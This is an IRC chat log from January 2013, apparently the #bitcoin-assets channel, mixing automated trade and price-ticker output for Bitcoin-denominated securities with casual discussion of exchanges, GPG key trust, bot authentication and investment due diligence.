18 01:54:29 [BTCTC] [BASIC-MINING] 1 @ 0.3299 BTC [-] Jan 18 01:55:06 [BTCTC] [BASIC-MINING] 34 @ 0.3299 = 11.2166 BTC [-] Jan 18 01:56:36 ;;ticker Jan 18 01:56:37 BTCUSD ticker | Best bid: 15.55001, Best ask: 15.61183, Bid-ask spread: 0.06182, Last trade: 15.55001, 24 hour volume: 64376.35373078, 24 hour low: 14.63000, 24 hour high: 15.69999, 24 hour vwap: 15.15862 Jan 18 01:56:52 [BTCTC] [BASIC-MINING] 8 @ 0.33 = 2.64 BTC [+] Jan 18 01:56:54 it chewed through that 1500 quick Jan 18 01:57:20 [MPEX] [S.DICE] 200 @ 0.00595623 = 1.1912 BTC [-] Jan 18 01:57:45 about 1200 sold down to 15.45, but its bouncin back up Jan 18 01:58:07 I'm not the law, but I represent justice, wearing fake ces badge wherever i can. Jan 18 02:01:06 ;;ticker Jan 18 02:01:07 BTCUSD ticker | Best bid: 15.60000, Best ask: 15.63373, Bid-ask spread: 0.03373, Last trade: 15.60000, 24 hour volume: 65938.68516129, 24 hour low: 14.63000, 24 hour high: 15.69999, 24 hour vwap: 15.16893 Jan 18 02:01:19 just hit 15.70 on gox Jan 18 02:01:42 ;;ticker Jan 18 02:01:43 BTCUSD ticker | Best bid: 15.59000, Best ask: 15.71999, Bid-ask spread: 0.12999, Last trade: 15.59000, 24 hour volume: 66620.50423114, 24 hour low: 14.63000, 24 hour high: 15.71999, 24 hour vwap: 15.17564 Jan 18 02:02:04 its all in the timing :/ Jan 18 02:08:42 [MPEX] [S.MPOE] 5200 @ 0.00067862 = 3.5288 BTC [+] Jan 18 02:08:44 [MPEX] [S.MPOE] 9500 @ 0.00067694 = 6.4309 BTC [-] Jan 18 02:13:20 [MPEX] [S.MPOE] 1900 @ 0.00067694 = 1.2862 BTC [-] Jan 18 02:13:22 [MPEX] [S.MPOE] 11965 @ 0.00066884 = 8.0027 BTC [-] Jan 18 02:14:52 btw rg changed his WoT key Jan 18 02:15:32 lost his old key? Jan 18 02:15:36 no he gave the old one away with bitvps Jan 18 02:15:47 hmmm Jan 18 02:15:53 drawing the ire of #bitcoin-assets dwellers Jan 18 02:16:11 one doesn't just give gpg key to others Jan 18 02:16:19 no Jan 18 02:17:16 why no? namworld did say they used it to pay divs, no? Jan 18 02:17:17 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Jan 18 02:17:20 jeez. Jan 18 02:17:26 cmon someone sell Jan 18 02:19:33 you're right, you don't give away your key, you work something out Jan 18 02:20:57 rg has some explaining to do in #otc when he comes back from shower.. if he'lll bother at all Jan 18 02:21:22 kakobrekla awesome Jan 18 02:21:25 nobody seems to know what happened around bitvps Jan 18 02:22:11 but i'm off... nite Jan 18 02:29:48 I guess one problem is that people who trust rg don't know that they now need to trust other people Jan 18 02:30:29 the fact that rg trusts them is not really relevant Jan 18 02:37:23 [MPEX] [S.DICE] 200 @ 0.00595623 = 1.1912 BTC [-] Jan 18 02:46:54 [MPEX] [S.MPOE] 11700 @ 0.00067375 = 7.8829 BTC [+] Jan 18 02:46:55 jcpham was appointed as the third? mircea_popescu when do argumets start? Jan 18 02:46:56 [MPEX] [S.MPOE] 3033 @ 0.00066884 = 2.0286 BTC [-] Jan 18 02:52:06 http://blockchained.com/depth_mtgox.png Jan 18 02:52:08 jebus Jan 18 02:53:21 [MPEX] [S.MPOE] 18650 @ 0.00066884 = 12.4739 BTC [-] Jan 18 02:58:13 Hopefully soon Jan 18 02:58:42 I'm still a bit confused as to the reason this even went to the rota Jan 18 03:04:52 [MPEX] [S.MPOE] 12952 @ 0.00066884 = 8.6628 BTC [-] Jan 18 03:05:03 [MPEX] [S.MPOE] 4314 @ 0.00066249 = 2.858 BTC [-] Jan 18 03:05:36 [MPEX] [S.MPOE] 10484 @ 0.00067999 = 7.129 BTC [+] Jan 18 03:05:42 [MPEX] [S.MPOE] 11586 @ 0.00068 = 7.8785 BTC [+] Jan 18 03:13:01 mircea_popescu: What do you think of the new logo? https://nastyfans.org Jan 18 03:14:22 the buyers and the sellers aren't too close on that S.BVPS Jan 18 03:18:53 OgNasty actually it's a lot better Jan 18 03:19:44 smickles they started Jan 18 03:20:09 ;;ticker Jan 18 03:20:11 BTCUSD ticker | Best bid: 15.74226, Best ask: 15.88987, Bid-ask spread: 0.14761, Last trade: 15.88989, 24 hour volume: 67768.21255602, 24 hour low: 14.63000, 24 hour high: 15.88990, 24 hour vwap: 15.21111 Jan 18 03:20:25 mircea_popescu: Thank you. Any other suggestions? Jan 18 03:20:43 if anything occurs i'll mention. Jan 18 03:21:33 [BTCTC] [ESECURITYSABTC] 2 @ 0.7032 = 1.4064 BTC [-] Jan 18 03:21:34 [BTCTC] [ESECURITYSABTC] 22 @ 0.7 = 15.4 BTC [-] Jan 18 03:21:35 Charts will be coming soon... Jan 18 03:21:54 If only I could get NastyFans broadcast via @assbot... Jan 18 03:22:22 why can't you ? Jan 18 03:22:40 I don't have the answer to that question. Jan 18 03:23:23 [BTCTC] [ESECURITYSABTC] 30 @ 0.7 = 21 BTC [-] Jan 18 03:24:05 lol: "Fixing it now is better than fixing it later." garnered: "Go f*ck yourself now is better than go f*ck yourself later." Jan 18 03:24:28 [BTCTC] [ESECURITYSABTC] 50 @ 0.7 = 35 BTC [-] Jan 18 03:24:36 sounds legit. Jan 18 03:24:41 some of the context: Jan 18 03:24:43 https://bitcointalk.org/index.php?topic=136795.msg1457904#msg1457904 Jan 18 03:26:03 but Do you know what hardware and tech the military has? Jan 18 03:26:26 i once had sex with this chick that was also a marine. Jan 18 03:26:31 do you know what fanny she had ?! Jan 18 03:26:52 mircea_popescu: apparently they are afraid that they have stuff which is one quadtrillion times better than the theorhetical computing power of the entire planet Jan 18 03:27:13 it was in that one movie right ? Jan 18 03:27:19 answer me this: how can a subset be larger than the whole? Jan 18 03:27:51 mircea_popescu: what about her calves? musta been huge! Jan 18 03:28:48 she could benchpress my 16 ton hammer. Jan 18 03:30:36 [MPEX] [S.MPOE] 3950 @ 0.00066249 = 2.6168 BTC [-] Jan 18 03:30:54 Confirmed total: 2,239 BTC Jan 18 03:31:09 ok, guise, who is inflating bitbet bets! Jan 18 03:33:03 No @assbot for NastyFans. :( DENIED Jan 18 03:33:29 Off to the Laker game. Have a good night all. Jan 18 03:34:05 denied lol what ? Jan 18 03:44:14 !ticker wtf OgnAsty Jan 18 03:44:15 It's so strange that you don't remember any of your poetry. Jan 18 03:46:20 !ticker wtf pigeons Jan 18 03:46:21 Are you sure you have no tobacco? Jan 18 03:46:26 !ticker wtf pigeons Jan 18 03:46:27 The round stones beneath the earth... have spoken through the fire. Jan 18 03:46:43 !ticker m O.BTCUSD.C150T Jan 18 03:46:44 [MPEX:O.BTCUSD.C150T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07071277 / 0.07071277 / 0.07071277 (1 shares, 0.07 BTC), 30D: 0.01498159 / 0.0227757 / 0.17406879 (913 shares, 20.79 BTC) Jan 18 03:46:50 !ticker m O.BTCUSD.C140T Jan 18 03:46:51 [MPEX:O.BTCUSD.C140T] 1D: 0.1385 / 0.1405432 / 0.1409839 (620 shares, 87.14 BTC), 7D: 0.10808014 / 0.14008878 / 0.14775821 (635 shares, 88.96 BTC), 30D: 0.01359389 / 0.0690355 / 0.19999999 (1671 shares, 115.36 BTC) Jan 18 03:49:35 [MPEX] [O.BTCUSD.C150T] 1 @ 0.07778404 BTC [+] Jan 18 03:50:19 [MPEX] [O.BTCUSD.C140T] 10 @ 0.13757515 = 1.3758 BTC [-] Jan 18 03:50:40 wtf is this wtf command? Jan 18 03:50:58 !ticker last tango in paris Jan 18 03:50:59 Have you got any tobacco? Jan 18 03:51:08 I got a cigar... Jan 18 03:52:18 !ticker last mircea_popescu Jan 18 03:52:19 The eagle never lost so much time as when he submitted to learn from the crow. Jan 18 03:52:31 da fuck Jan 18 03:52:49 !ticker figlio di puttana Jan 18 03:52:52 Shit. You ain't even old enough to smoke. Jan 18 03:53:23 !ticker clerks Jan 18 03:53:24 The eagle never lost so much time as when he submitted to learn from the crow. Jan 18 03:53:28 boo Jan 18 03:53:34 assbot : urmom ---> http://polimedia.us/dtng/c/src/135829127564.gif Jan 18 03:54:00 clearly, that was assbot's conception Jan 18 03:54:34 [MPEX] [S.MPOE] 165 @ 0.00066249 = 0.1093 BTC [-] Jan 18 03:54:34 [MPEX] [S.MPOE] 11706 @ 0.00066193 = 7.7486 BTC [-] Jan 18 03:54:35 [MPEX] [S.MPOE] 2829 @ 0.00066 = 1.8671 BTC [-] Jan 18 03:54:44 [MPEX] [S.DICE] 400 @ 0.00587453 = 2.3498 BTC [-] Jan 18 04:06:27 [MPEX] [S.MPOE] 11400 @ 0.00066422 = 7.5721 BTC [+] Jan 18 04:08:09 [MPEX] [S.MPOE] 9400 @ 0.00066 = 6.204 BTC [-] Jan 18 04:13:44 Quest for vision is a great blessing. Jan 18 04:17:12 0 Jan 18 04:18:42 who broke assbot Jan 18 04:19:07 i guess what has been seen cannot be unseen Jan 18 04:19:37 im tryin to add some stuff Jan 18 04:19:49 http://www.youtube.com/watch?v=tYGCpGzFWh0 Jan 18 04:19:54 this should be the bitcoin hymn Jan 18 04:20:32 ;;everify Jan 18 04:20:32 (everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Jan 18 04:20:40 ;;eauth Jan 18 04:20:40 (eauth ) -- Initiate authentication for user . You must have registered a GPG key with the bot for this to work. You will be given a link to a page which contains a one time password encrypted with your key. Decrypt, and use the 'everify' command with it. Your passphrase will expire in 10 minutes. Jan 18 04:20:42 thats the problem Jan 18 04:20:45 ;;eauth thestringpuller Jan 18 04:20:47 Request successful for user thestringpuller, hostmask thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/0FF2943DA179E169 Jan 18 04:20:49 switching between languages Jan 18 04:21:02 i end up writing js in mql and python in php Jan 18 04:21:11 no wonder nothing works Jan 18 04:21:47 i haz prwz now. obey. Jan 18 04:22:47 ;;everify Jan 18 04:22:47 (everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). Jan 18 04:22:50 ;;everify freenode:#bitcoin-otc:855535b1193e66576780bc7ba4adc284748055c9d43638c764230208 Jan 18 04:22:50 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Jan 18 04:23:03 :( Jan 18 04:23:24 ;;identify Jan 18 04:23:25 Error: That operation cannot be done in a channel. Jan 18 04:23:37 i need a volunteer Jan 18 04:24:33 someone raise their hand or its you thestringpuller Jan 18 04:25:03 ;;identify smickles Jan 18 04:25:03 Error: That operation cannot be done in a channel. Jan 18 04:25:14 >:( Jan 18 04:25:36 ok it works. Jan 18 04:26:04 >:( thanks kakobrekla Jan 18 04:26:07 was just a test Jan 18 04:26:17 i volunteered you Jan 18 04:26:19 no worries Jan 18 04:28:11 thestringpuller: :* Jan 18 04:29:17 lol Jan 18 04:33:10 thestringpuller: it's ";;ident " Jan 18 04:33:23 ;;ident thestringpuller Jan 18 04:33:24 Nick 'thestringpuller', with hostmask 'thestringpuller!~leflor@99-39-98-185.lightspeed.tukrga.sbcglobal.net', is identified as user thestringpuller, with GPG key id 0FF2943DA179E169, key fingerprint 6ACE36E786F39A4ADC4506DE0FF2943DA179E169, and bitcoin address None Jan 18 04:33:29 :) Jan 18 04:37:16 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Jan 18 04:37:20 someone just put another 500 down Jan 18 04:37:39 :amazed: Jan 18 04:37:57 2 or 3 bloks ago Jan 18 04:47:12 [MPEX] [S.BVPS] 156 @ 0.00040004 = 0.0624 BTC [+] Jan 18 04:49:18 Who sells those at those prices anyway? Jan 18 04:49:25 [BTCTC] [GSDPT] 216 @ 0.0049 = 1.0584 BTC [-] Jan 18 04:49:48 weirdos or bots Jan 18 04:49:55 thestringpuller: hey Jan 18 04:50:05 I still havent had a chance to do much with teh ff7 disc2 Jan 18 04:50:12 i cant just stick it in the system and "test" it Jan 18 04:50:13 Anyone selling S.BVPS shares? Jan 18 04:50:17 Namworld: on s.bvps? Jan 18 04:50:28 yeah Jan 18 04:50:31 i might know a guy Jan 18 04:50:37 it requests to insert disc 1. i would have to play thru disc one. not that i am unwilling. i just havent had anytime for games. Jan 18 04:50:49 Namworld: what rate? Jan 18 04:51:38 Namworld: no go here Jan 18 04:52:08 [MPEX] [S.MPOE] 4771 @ 0.00066 = 3.1489 BTC [-] Jan 18 04:52:09 [MPEX] [S.MPOE] 22935 @ 0.00065988 = 15.1343 BTC [-] Jan 18 04:56:11 You can offer. Not sure just how much I can pay. Jan 18 04:56:21 But I'm buying for my personal stake. Jan 18 04:56:58 so is s.bvps going to the pink sheets, or privatizing? Jan 18 04:59:42 isnt it getting delisted? Jan 18 05:01:04 :amazed: << i would expect anyone cancelling an order would put a little in Jan 18 05:01:08 by way of hedging Jan 18 05:01:43 "So lets ballpark it to say ~50,000 brand new nuclear reactors constructed and running continually to power nothing but this non-existent alien tech perfect computer for the next 10,000 years .... and it would still only have less than a 10% chance of brute forcing a Bitcoin address." Jan 18 05:04:48 "Just realized that 30btc is an actual fee. I'm not able to pay that much just to set up an account. Sorry for the trouble." Jan 18 05:05:03 one of these nice exchanges had better started advertising soon Jan 18 05:05:10 [HAVELOCK] [SDICE] 13 @ 0.59 = 7.67 BTC [+] Jan 18 05:05:11 im getting burried in these Jan 18 05:06:09 [HAVELOCK] [SDICE] 3 @ 0.5925 = 1.7775 BTC [+] Jan 18 05:07:59 "actual fee" Jan 18 05:09:06 mircea_popescu: why do people think they arn't supposed to pay the fee? Jan 18 05:09:18 i blame obama, personally. Jan 18 05:11:40 [MPEX] [S.MPOE] 21600 @ 0.00066265 = 14.3132 BTC [+] Jan 18 05:11:42 [MPEX] [S.MPOE] 10650 @ 0.00066422 = 7.0739 BTC [+] Jan 18 05:11:44 [MPEX] [S.MPOE] 2656 @ 0.00066608 = 1.7691 BTC [+] Jan 18 05:11:45 [MPEX] [S.MPOE] 13742 @ 0.00066755 = 9.1735 BTC [+] Jan 18 05:11:46 [MPEX] [S.MPOE] 4300 @ 0.00066908 = 2.877 BTC [+] Jan 18 05:11:47 [MPEX] [S.MPOE] 1082 @ 0.00067161 = 0.7267 BTC [+] Jan 18 05:13:54 ;;tslb Jan 18 05:13:57 Time since last block: 2 minutes and 4 seconds Jan 18 05:15:27 [MPEX] [S.DICE] 1825 @ 0.00586004 = 10.6946 BTC [-] Jan 18 05:15:28 [MPEX] [S.DICE] 1163 @ 0.00577278 = 6.7137 BTC [-] Jan 18 05:15:30 [MPEX] [S.DICE] 2349 @ 0.00575741 = 13.5242 BTC [-] Jan 18 05:15:31 [MPEX] [S.DICE] 1000 @ 0.0057507 = 5.7507 BTC [-] Jan 18 05:15:32 [MPEX] [S.DICE] 1917 @ 0.00573653 = 10.9969 BTC [-] Jan 18 05:15:34 [MPEX] [S.DICE] 1746 @ 0.00562305 = 9.8178 BTC [-] Jan 18 05:16:52 [MPEX] [S.BBET] 2000 @ 0.00100008 = 2.0002 BTC [-] Jan 18 05:16:54 [MPEX] [S.BBET] 65000 @ 0.00100007 = 65.0046 BTC [-] Jan 18 05:17:53 smickles: we have to decide on that. Jan 18 05:18:08 We might relist or do a buyback. Jan 18 05:19:28 All I can say for now is that I don't personally intend to drop shareholders and rg asked us to keep everyone. Jan 18 05:21:08 We have to buy servers, we don't want to keep renting them. So we might not be able to do a buyback right away. Jan 18 05:21:17 So we'll probably relist. Jan 18 05:21:35 interesting Jan 18 05:21:46 I'll make a statement once we decide. Jan 18 05:24:05 [MPEX] [O.BTCUSD.P200T] 120 @ 0.31068697 = 37.2824 BTC [-] Jan 18 05:26:50 [MPEX] [O.BTCUSD.P200T] 30 @ 0.31068697 = 9.3206 BTC [-] Jan 18 05:27:24 [MPEX] [O.BTCUSD.P200T] 8 @ 0.31068697 = 2.4855 BTC [-] Jan 18 05:28:03 ok, so my bot basically went long at 13.92, good move? Jan 18 05:28:14 maybe lucky? Jan 18 05:30:21 prolly a good move, it's 16 now no ? Jan 18 05:34:01 smickles was that your bot selling 1 C150T for under exercise? Jan 18 05:35:07 ;;asks 16.98 Jan 18 05:35:11 There are currently 8261.7695 bitcoins offered at or under 16.98 USD, worth 134515.212674 USD in total. Jan 18 05:35:21 ;;asks 19.98 Jan 18 05:35:23 There are currently 23799.02 bitcoins offered at or under 19.98 USD, worth 417539.998424 USD in total. Jan 18 05:37:28 Bugpowder: when? Jan 18 05:38:24 in the beginning when I was testing the selling part, i had it just selling into mpoebot Jan 18 05:39:33 ;;ticker Jan 18 05:39:34 BTCUSD ticker | Best bid: 15.73125, Best ask: 15.73999, Bid-ask spread: 0.00874, Last trade: 15.73999, 24 hour volume: 67109.92386210, 24 hour low: 14.63000, 24 hour high: 15.98500, 24 hour vwap: 15.30923 Jan 18 05:39:58 [MPEX] [O.BTCUSD.P200T] 180 @ 0.31068697 = 55.9237 BTC [-] Jan 18 05:40:35 [MPEX] [O.BTCUSD.P200T] 40 @ 0.31068697 = 12.4275 BTC [-] Jan 18 05:41:30 [MPEX] [O.BTCUSD.P200T] 2 @ 0.31068697 = 0.6214 BTC [-] Jan 18 05:42:33 what is this p20 bot upto? Jan 18 05:44:33 Selling puts... Jan 18 05:46:46 but the pattern of the amounts Jan 18 05:47:05 it's like it doesn't expect to sell all of them Jan 18 05:50:49 looks more like it mkopts more out of the proceeds for the sale Jan 18 05:55:17 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.25592664 = 255.9266 BTC [-] Jan 18 05:55:24 [MPEX] [O.BTCUSD.P170T] 1000 @ 0.19327969 = 193.2797 BTC [-] Jan 18 05:55:27 [MPEX] [O.BTCUSD.P160T] 1000 @ 0.13797862 = 137.9786 BTC [-] Jan 18 05:55:35 [MPEX] [S.MPOE] 11600 @ 0.00066953 = 7.7665 BTC [-] Jan 18 05:56:12 [MPEX] [S.MPOE] 25501 @ 0.00066953 = 17.0737 BTC [-] Jan 18 05:56:14 [MPEX] [S.MPOE] 2165 @ 0.00065988 = 1.4286 BTC [-] Jan 18 05:57:39 shouldn't getting margin be more cost effective? Jan 18 05:59:16 [BTCTC] [BASIC-MINING] 23 @ 0.3299 = 7.5877 BTC [-] Jan 18 05:59:18 [BTCTC] [BASIC-MINING] 2 @ 0.33 = 0.66 BTC [+] Jan 18 05:59:29 maybe not big enough for margin Jan 18 06:00:03 anyway, this was enough excitement for one day. stay out of trouble all! **** BEGIN LOGGING AT Fri Jan 18 11:03:59 2013 Jan 18 11:04:18 [MPEX] [S.MPOE] 911 @ 0.00067348 = 0.6135 BTC [-] Jan 18 11:04:20 [MPEX] [S.MPOE] 1529 @ 0.00067498 = 1.032 BTC [+] Jan 18 11:04:21 [MPEX] [S.MPOE] 19860 @ 0.00067874 = 13.4798 BTC [+] Jan 18 11:04:55 ;;ticker Jan 18 11:04:56 BTCUSD ticker | Best bid: 15.61873, Best ask: 15.62000, Bid-ask spread: 0.00127, Last trade: 15.62000, 24 hour volume: 71327.19256529, 24 hour low: 14.75000, 24 hour high: 15.98500, 24 hour vwap: 15.40766 Jan 18 11:06:12 [MPEX] [S.MPOE] 18800 @ 0.00067874 = 12.7603 BTC [+] Jan 18 11:19:09 [MPEX] [S.MPOE] 5445 @ 0.00067874 = 3.6957 BTC [+] Jan 18 11:19:10 [MPEX] [S.MPOE] 6000 @ 0.00067999 = 4.0799 BTC [+] Jan 18 11:19:12 [MPEX] [S.MPOE] 8805 @ 0.00067999 = 5.9873 BTC [+] Jan 18 11:32:15 [MPEX] [S.MPOE] 8528 @ 0.00067999 = 5.799 BTC [+] Jan 18 11:32:17 [MPEX] [S.MPOE] 53922 @ 0.00068 = 36.667 BTC [+] Jan 18 11:34:16 [BTCTC] [BASIC-MINING] 20 @ 0.33 = 6.6 BTC [+] Jan 18 11:36:35 !ticker s.dice Jan 18 11:36:37 It's so strange that you don't remember any of your poetry. Jan 18 11:36:40 !ticker m s.dice Jan 18 11:36:42 [MPEX:S.DICE] 1D: 0.00562305 / 0.00581963 / 0.00598999 (25440 shares, 148.05 BTC), 7D: 0.00449034 / 0.00473285 / 0.00598999 (2353905 shares, 11,140.70 BTC), 30D: 0.0014 / 0.00372888 / 0.00598999 (11724917 shares, 43,720.82 BTC) Jan 18 11:44:35 [MPEX] [S.MPOE] 13548 @ 0.00067978 = 9.2097 BTC [-] Jan 18 11:48:18 http://trilema.com/wp-content/uploads/2012/02/traxt-s.png << 0.1337 btc to anyone who figures out wtf that is. Jan 18 11:49:36 mircea_popescu: connection graph of coin spends in the chain? Jan 18 11:49:44 nope Jan 18 11:49:54 [MPEX] [S.MPOE] 58723 @ 0.00068 = 39.9316 BTC [+] Jan 18 11:50:05 looks like a job for D3, though Jan 18 11:50:35 [MPEX] [S.MPOE] 12975 @ 0.00068 = 8.823 BTC [+] Jan 18 11:53:02 [MPEX] [S.DICE] 100 @ 0.00588706 = 0.5887 BTC [-] Jan 18 11:53:03 [MPEX] [S.DICE] 1333 @ 0.00588707 = 7.8475 BTC [+] Jan 18 12:00:58 [MPEX] [S.MPOE] 4252 @ 0.00067978 = 2.8904 BTC [-] Jan 18 12:00:58 sdice betting? Jan 18 12:00:59 [MPEX] [S.MPOE] 1548 @ 0.00067149 = 1.0395 BTC [-] Jan 18 12:01:50 mpex ordering? Jan 18 12:06:34 markedathome neither Jan 18 12:08:08 [MPEX] [S.MPOE] 2556 @ 0.00067149 = 1.7163 BTC [-] Jan 18 12:08:09 [MPEX] [S.MPOE] 10344 @ 0.00066997 = 6.9302 BTC [-] Jan 18 12:10:33 mpoe-pr posting ratio of content:troll Jan 18 12:11:24 number of times bfl has slipped their shipping date Jan 18 12:12:08 neither :D Jan 18 12:12:19 mpoe-pr trolls !? Jan 18 12:13:06 user to btcfpga bitcoin payments and reversals? Jan 18 12:13:29 nope. Jan 18 12:13:43 i'll give a hint : the vertical is time Jan 18 12:14:04 [MPEX] [S.DICE] 500 @ 0.00582625 = 2.9131 BTC [-] Jan 18 12:14:06 [MPEX] [S.DICE] 700 @ 0.00580536 = 4.0638 BTC [-] Jan 18 12:16:06 one of the glbse stocks dividends? the gap being the october-late dec? Jan 18 12:17:51 nope Jan 18 12:31:01 [MPEX] [S.DICE] 2000 @ 0.00569484 = 11.3897 BTC [-] Jan 18 12:33:53 http://trilema.com/2013/since-you-boys-are-printing-tanks-now/ Jan 18 12:33:54 ahh! Jan 18 13:02:55 [MPEX] [S.MPOE] 25177 @ 0.00067607 = 17.0214 BTC [+] Jan 18 13:02:57 [MPEX] [S.MPOE] 23523 @ 0.00068 = 15.9956 BTC [+] Jan 18 13:17:35 ;;tslb Jan 18 13:17:42 Time since last block: 12 minutes and 13 seconds Jan 18 13:18:30 [MPEX] [S.MPOE] 9050 @ 0.00067375 = 6.0974 BTC [-] Jan 18 13:18:32 [MPEX] [S.MPOE] 20800 @ 0.00067354 = 14.0096 BTC [-] Jan 18 13:18:33 [MPEX] [S.MPOE] 2450 @ 0.00066997 = 1.6414 BTC [-] Jan 18 13:29:26 [MPEX] [S.MPOE] 5550 @ 0.00067579 = 3.7506 BTC [+] Jan 18 13:30:29 [MPEX] [S.MPOE] 19906 @ 0.00066997 = 13.3364 BTC [-] Jan 18 13:30:31 [MPEX] [S.MPOE] 8867 @ 0.00066909 = 5.9328 BTC [-] Jan 18 13:34:57 [MPEX] [S.MPOE] 3451 @ 0.00066909 = 2.309 BTC [-] Jan 18 13:37:28 [MPEX] [S.MPOE] 10982 @ 0.00066909 = 7.3479 BTC [-] Jan 18 13:37:30 [MPEX] [S.MPOE] 3718 @ 0.00066312 = 2.4655 BTC [-] Jan 18 13:41:27 Where can I get an intro to how bitcoin assets work... feel a bit skeptical Jan 18 13:43:26 you could ask a question here. Jan 18 13:49:58 [MPEX] [S.MPOE] 5882 @ 0.00066312 = 3.9005 BTC [-] Jan 18 13:49:59 [MPEX] [S.MPOE] 6768 @ 0.00066081 = 4.4724 BTC [-] Jan 18 13:56:16 [BTCTC] [GSDPT] 75 @ 0.0063 = 0.4725 BTC [+] Jan 18 13:58:54 [MPEX] [S.MPOE] 3650 @ 0.00067579 = 2.4666 BTC [+] Jan 18 13:58:56 [MPEX] [S.MPOE] 3650 @ 0.00067777 = 2.4739 BTC [+] Jan 18 13:59:00 how it works? weusecoins.org? :P Jan 18 13:59:04 you seen that video ? Jan 18 13:59:08 not the most detailed granted Jan 18 13:59:08 heh Jan 18 14:03:29 [MPEX] [S.DICE] 1300 @ 0.00573103 = 7.4503 BTC [+] Jan 18 14:09:09 [MPEX] [S.MPOE] 19850 @ 0.00067777 = 13.4537 BTC [+] Jan 18 14:09:11 [MPEX] [S.MPOE] 2500 @ 0.00067874 = 1.6969 BTC [+] Jan 18 14:09:26 [MPEX] [S.MPOE] 350 @ 0.00068 = 0.238 BTC [+] Jan 18 14:20:13 [MPEX] [S.MPOE] 1000 @ 0.00067999 = 0.68 BTC [-] Jan 18 14:20:15 [MPEX] [S.MPOE] 16859 @ 0.00068 = 11.4641 BTC [+] Jan 18 14:24:22 [MPEX] [S.MPOE] 1000 @ 0.00067999 = 0.68 BTC [-] Jan 18 14:24:24 [MPEX] [S.MPOE] 11041 @ 0.00068 = 7.5079 BTC [+] Jan 18 14:25:28 [MPEX] [S.MPOE] 2500 @ 0.00067163 = 1.6791 BTC [-] Jan 18 14:29:42 I like how the speculation moved to S.MPOE after the price jumped on S.DICE Jan 18 14:29:47 [MPEX] [S.MPOE] 3213 @ 0.00066815 = 2.1468 BTC [-] Jan 18 14:32:41 [MPEX] [S.MPOE] 19700 @ 0.00067163 = 13.2311 BTC [+] Jan 18 14:32:42 [MPEX] [S.MPOE] 11972 @ 0.00068 = 8.141 BTC [+] Jan 18 14:35:59 !ticker m s.mpoe Jan 18 14:36:01 [MPEX:S.MPOE] 1D: 0.0006592 / 0.00067222 / 0.00068 (1713736 shares, 1,152.02 BTC), 7D: 0.00062772 / 0.00066182 / 0.00068 (7984446 shares, 5,284.29 BTC), 30D: 0.000612 / 0.0006408 / 0.00068 (40520553 shares, 25,965.93 BTC) Jan 18 14:37:03 !ticker m s.dice Jan 18 14:37:05 [MPEX:S.DICE] 1D: 0.00562305 / 0.00580999 / 0.00598999 (30973 shares, 179.95 BTC), 7D: 0.00449034 / 0.00473568 / 0.00598999 (2338118 shares, 11,072.60 BTC), 30D: 0.0014 / 0.00372991 / 0.00598999 (11730850 shares, 43,755.07 BTC) Jan 18 14:37:17 [MPEX] [S.DICE] 1400 @ 0.00569484 = 7.9728 BTC [-] Jan 18 14:38:15 I know bitcoin very well, but not sure how the various assets are enforced Jan 18 14:39:16 Schadenfreude yeah Jan 18 14:39:25 jago25_98 ok, well, so formulate some q's. Jan 18 14:39:46 ;;ticker Jan 18 14:39:48 BTCUSD ticker | Best bid: 15.61700, Best ask: 15.62000, Bid-ask spread: 0.00300, Last trade: 15.59001, 24 hour volume: 77117.60812390, 24 hour low: 14.84978, 24 hour high: 15.98500, 24 hour vwap: 15.46155 Jan 18 14:40:29 mircea_popescu: I guess the question is... if I buy stock... how do I know it's not a scam. Perhaps I need to read how the normal stock market works first Jan 18 14:40:31 so basically we went up a whole dollar because somebody wanted 20k of bitcoins to keep on top of the ~50k being dicked around back and forth every given day Jan 18 14:40:51 jago25_98 well, this is called due dilligence. Jan 18 14:41:12 mpex has signed contracts, the first step is to read those. then you evaluate the owner, the business, investing is a process Jan 18 14:41:20 I need some sort of begineers guide Jan 18 14:41:24 but ultimately you never know with certainty it won't ever blow up Jan 18 14:41:34 ah ok it's all on a signiture Jan 18 14:41:51 yes, all business is built on a signature Jan 18 14:42:14 hence the word firm. it comes from medieval italian for signature (firma) Jan 18 14:45:29 So main difference to a major stock exchange is that the price is denominated in BTC. There's nothing new Jan 18 14:49:35 [MPEX] [S.MPOE] 500 @ 0.00067999 = 0.34 BTC [-] Jan 18 14:49:37 [MPEX] [S.MPOE] 24296 @ 0.00068 = 16.5213 BTC [+] Jan 18 14:51:07 could there ever be something new ? Jan 18 14:51:58 [BTCTC] [BASIC-MINING] 3 @ 0.33 = 0.99 BTC [+] Jan 18 14:54:00 like what? satoshi came out, intends to fund space colonization? Jan 18 14:54:22 how would that be new ? it still would be... his signature. Jan 18 14:55:22 i would say mpex stocks are as reputable as traditional stocks due to the amount of trust that goes into it Jan 18 14:55:34 with each new scam mpex's trust (as well as the others) goes up Jan 18 14:57:17 kind of hard to compare. Jan 18 14:59:36 lol, how did you come up with that? Jan 18 15:16:46 thestringpuller: how did you come up with that? -> "i would say mpex stocks are as reputable as traditional stocks due to the amount of trust that goes into it " Jan 18 15:17:20 [MPEX] [S.MPOE] 23440 @ 0.00068 = 15.9392 BTC [+] Jan 18 15:18:06 lol Jan 18 15:19:09 MPEX stocks are just a speculative risk / reward play. Risks are much higher than an SP500 stock, rewards are much higher too, so far at least. Jan 18 15:21:02 "thestringpuller | with each new scam mpex's trust (as well as the others) goes up " Jan 18 15:21:13 amazing :) Jan 18 15:21:21 azx i think he meant "scam not on mpex" Jan 18 15:21:59 "Update: rumors of bASIC’s demise have been, at least for now, grossly exaggerated." gotta love the bitcoin rag, such reliable reporting. Jan 18 15:23:29 I am sorry I let you down I really am and I hope the Asians took good care of you. Jan 18 15:24:09 incidentally, i am really flabbergasted at everyone's use of qfn for asic chips. Jan 18 15:24:35 [MPEX] [S.MPOE] 21200 @ 0.00068 